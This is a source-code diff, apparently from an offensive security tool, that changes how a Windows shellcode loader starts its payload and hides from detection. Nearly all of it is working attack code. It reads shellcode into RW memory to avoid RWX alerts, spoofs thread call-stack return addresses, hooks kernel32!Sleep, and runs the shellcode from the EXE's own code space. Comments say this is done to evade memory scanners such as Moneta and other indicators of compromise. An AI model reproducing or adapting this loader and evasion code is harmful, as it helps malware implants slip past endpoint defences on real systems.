    273  - if (g_stackTraceSpoofing.spoofedFrames < MaxStackFramesToSpoof)
    274  - {
    275  - //
    276  - // We will use CreateFileW as a fake return address to place onto the thread's frame on stack.
    277  - //
    278  - frame.overwriteWhat = (ULONG_PTR)::CreateFileW;
    279  - 
    280  - //
    281  - // We're saving original frame to later use it for call stack restoration.
    282  - //
    283  - g_stackTraceSpoofing.spoofedFrame[g_stackTraceSpoofing.spoofedFrames++] = frame;
    284  - }
    285  - }
    286  - 
    287  - for (size_t i = 0; i < g_stackTraceSpoofing.spoofedFrames; i++)
    288  - {
    289  - auto frame = g_stackTraceSpoofing.spoofedFrame[i];
    290  - 
    291  - //
    292  - // We overwrite thread's frame by writing a function pointer onto the thread's stack precisely where
    293  - // the function's return address stored.
    294  - //
    295  - *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.overwriteWhat;
    296  - 
    297  - log("\t\t\tSpoofed: 0x",
    298  - std::setw(8), std::setfill('0'), std::hex, frame.retAddr, " -> 0x", frame.overwriteWhat);
    299  - }
    300  - }
    301  - else
    302  - {
    303  - for (size_t i = 0; i < g_stackTraceSpoofing.spoofedFrames; i++)
    304  - {
    305  - auto frame = g_stackTraceSpoofing.spoofedFrame[i];
    306  - 
    307  - //
    308  - // Here we restore original return addresses so that our shellcode can continue its execution.
    309  - //
    310  - *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.retAddr;
    311  - 
    312  - log("\t\t\tRestored: 0x", std::setw(8), std::setfill('0'), std::hex, frame.overwriteWhat, " -> 0x", frame.retAddr);
    313  - }
    314  - 
    315  - memset(g_stackTraceSpoofing.spoofedFrame, 0, sizeof(g_stackTraceSpoofing.spoofedFrame));
    316  - g_stackTraceSpoofing.spoofedFrames = 0;
    317  - }
    318  - 
    319  - return;
    320  -}
    321  - 
    322  -bool initStackSpoofing()
    323  -{
    324  - memset(&g_stackTraceSpoofing, 0, sizeof(g_stackTraceSpoofing));
    325  - 
    326  - //
    327  - // Firstly we need to load dbghelp.dll to resolve necessary functions' pointers.
    328  - //
    329  - g_stackTraceSpoofing.hDbghelp = LoadLibraryA("dbghelp.dll");
    330  - if (!g_stackTraceSpoofing.hDbghelp)
    331  - return false;
    332  - 
    333  - //
    334  - // Now we resolve addresses of a few required functions.
    335  - //
    336  - g_stackTraceSpoofing.pSymFunctionTableAccess64 =
    337  - GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymFunctionTableAccess64");
    338  - g_stackTraceSpoofing.pSymGetModuleBase64 =
    339  - GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymGetModuleBase64");
    340  - g_stackTraceSpoofing.pStackWalk64 =
    341  - (typeStackWalk64)GetProcAddress(g_stackTraceSpoofing.hDbghelp, "StackWalk64");
    342  - auto pSymInitialize =
    343  - (typeSymInitialize)GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymInitialize");
    344  - 
    345  - if (!g_stackTraceSpoofing.pSymFunctionTableAccess64
    346  - || !g_stackTraceSpoofing.pSymGetModuleBase64
    347  - || !g_stackTraceSpoofing.pStackWalk64
    348  - || !pSymInitialize
    349  - )
    350  - return false;
    351  - 
    352  - //
    353  - // Now in order to get StackWalk64 working correctly, we need to call SymInitialize.
    354  - //
    355  - pSymInitialize(GetCurrentProcess(), nullptr, TRUE);
    356  - 
    357  - log("[+] Stack spoofing initialized.");
    358  - g_stackTraceSpoofing.initialized = true;
    359  - return true;
    360  -}
    361  - 
    362 120  bool readShellcode(const char* path, std::vector<uint8_t>& shellcode)
    363 121  {
    364 122   HandlePtr file(CreateFileA(
    skipped 18 lines
    383 141   return ReadFile(file.get(), shellcode.data(), lowSize, &readBytes, NULL);
    384 142  }
    385 143   
    386  -bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread)
     144 +void runShellcode(LPVOID param)
     145 +{
     146 + auto func = ((void(*)())param);
     147 + 
     148 + //
     149 + // Jumping to shellcode. Look at the comment in injectShellcode() describing why we opted to jump
     150 + // into shellcode in a classical manner instead of fancy hooking of
     151 + // ntdll!RtlUserThreadStart+0x21 as in the earlier ThreadStackSpoofer example.
     152 + //
     153 + func();
     154 +}
     155 + 
     156 +bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr& thread)
    387 157  {
    388 158   //
    389 159   // Firstly we allocate RW page to avoid RWX-based IOC detections
    skipped 18 lines
    408 178   if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old))
    409 179   return false;
    410 180   
     181 + /*
     182 + * We're not setting these pointers to let the hooked sleep handler figure them out itself.
     183 + *
     184 + g_fluctuationData.shellcodeAddr = alloc;
     185 + g_fluctuationData.shellcodeSize = shellcode.size();
     186 + g_fluctuationData.protect = Shellcode_Memory_Protection;
     187 + */
    411 188   
     189 + shellcode.clear();
     190 + 
     191 + //
     192 + // Example provided in previous release of ThreadStackSpoofer:
     193 + // https://github.com/mgeeky/ThreadStackSpoofer/blob/ec0237c5f8b1acd052d57562a43f40a20752b5ca/ThreadStackSpoofer/main.cpp#L417
     194 + // showed how we can start our shellcode from temporarily hooked ntdll!RtlUserThreadStart+0x21 .
     195 + //
     196 + // That approach was a bit flawed because as soon as we introduce a hook within a module,
     197 + // even if we immediately unhook it, the system allocates a page of memory (4096 bytes) of type MEM_PRIVATE
     198 + // inside the shared library's allocation, which otherwise consists of MEM_IMAGE/MEM_MAPPED pages.
    412 199   //
    413  - // In order for our thread to blend in more effectively, we start it from the ntdll!RtlUserThreadStart+0x21
    414  - // function that is hooked by placing a trampoline call into our shellcode. After a second, the function will be
    415  - // unhooked to remove easy leftovers (IOCs) and maintain process' stability.
     200 + // Memory scanners such as Moneta scan memory-mapped PE DLLs and flag any memory
     201 + // labeled as MEM_PRIVATE within their region, considering this (correctly!) a "Modified Code" anomaly.
    416 202   //
    417  - LPVOID fakeAddr = (LPVOID)(((ULONG_PTR)GetProcAddress(GetModuleHandleA("ntdll"), "RtlUserThreadStart")) + 0x21);
    418  - 
    419  - BYTE origRtlUserThreadStartBytes[16];
    420  - HookTrampolineBuffers buffers = { 0 };
    421  - buffers.previousBytes = buffers.originalBytes = origRtlUserThreadStartBytes;
    422  - buffers.previousBytesSize = buffers.originalBytesSize = sizeof(origRtlUserThreadStartBytes);
    423  - if (!fastTrampoline(true, (BYTE*)fakeAddr, alloc, &buffers))
    424  - return false;
    425  -
    426  - shellcode.clear();
    427  - 
     203 + // We're unable to evade this detection for kernel32!Sleep, however we can when it comes to ntdll. Instead of
     204 + // running our shellcode from a legitimate user thread callback, we can simply run a thread pointing to our
     205 + // own function and jump to the shellcode from there.
    428 206   //
    429  - // The shellcode starts from the hooked ntdll!RtlUserThreadStart+0x21
     207 + // After discussion I had with @waldoirc we came to the conclusion that in order not to bring other IOCs it is better
     208 + // to start shellcode from within EXE's own code space, thus avoiding detections based on `ntdll!RtlUserThreadStart+0x21`
     209 + // being an outstanding anomaly in some environments. Shout out to @waldoirc for our really long discussion!
    430 210   //
    431 211   thread.reset(::CreateThread(
    432 212   NULL,
    433 213   0,
    434  - (LPTHREAD_START_ROUTINE)fakeAddr,
    435  - 0,
     214 + (LPTHREAD_START_ROUTINE)runShellcode,
     215 + alloc,
    436 216   0,
    437 217   0
    438 218   ));
    439  - 
    440  - ::SleepEx(1000, false);
    441  - 
    442  - // Here we restore original stub bytes of that API.
    443  - if (!fastTrampoline(false, (BYTE*)fakeAddr, alloc, &buffers))
    444  - return false;
    445 219   
    446 220   return (NULL != thread.get());
    447 221  }
    skipped 18 lines
    466 240   
    467 241   if (spoof)
    468 242   {
    469  - log("[.] Thread call stack will be spoofed.");
    470  - if (!initStackSpoofing())
    471  - {
    472  - log("[!] Could not initialize stack spoofing!");
    473  - return 1;
    474  - }
    475  - 
    476 243   log("[.] Hooking kernel32!Sleep...");
    477 244   if (!hookSleep())
    478 245   {
    skipped 22 lines
  • images/legit-call-stack.png
  • images/spoofed.png
  • images/spoofed2.png